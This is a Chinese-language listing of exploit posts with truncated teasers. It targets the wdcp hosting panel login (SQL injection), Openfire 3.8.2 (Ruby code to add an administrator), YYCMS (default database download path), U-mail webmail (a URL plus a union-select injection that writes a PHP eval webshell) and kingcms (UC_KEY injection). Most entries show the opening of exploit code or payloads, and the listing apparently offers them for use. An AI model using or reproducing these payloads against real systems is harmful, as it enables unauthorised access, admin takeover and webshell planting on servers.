-
wdcp虚拟主机管理系统注入漏洞
wdcp服务器/虚拟主机管理系统登陆框注入漏洞。passwd字段存在注入风险,选择限制字符长度为30 辅助脚本<?php $id=$_GET["id"]; //$id2=$_GET["id2"]...
-
Openfire 3.8.2 server 添加管理员漏洞
利用代码如下:require ''rubygems''require ''xmpp4r''password="password"xmpp_server =...
-
YYCMS音乐程序v4.0 VIP版 默认数据库下载漏洞
YYCMS音乐程序 v4.0 VIP版,只是看了一下数据库文件 conn.asp 文件里 数据库地址是 YYCMS_Data/#67tingdata.asa.刚开始以为这个是默认的数据库, 后来查看数据库文件发现 ,数据库 是 /YYC...
-
大部分网站政府网站U-mail存在直接拿shell漏洞
加入webmail/userapply.php?execadd=333&DomainID=111直接爆出物理地址 然后将aa' union select 1,2,3,4,5,6,'<?php eval(...
-
kingcms最新版sql注入漏洞
api/uc.phpUC_KEY没有初始化导致注入<?phpdefine('UC_CLIENT_VERSION', '1.5.0'); //note UCenter 版本标识define('UC...
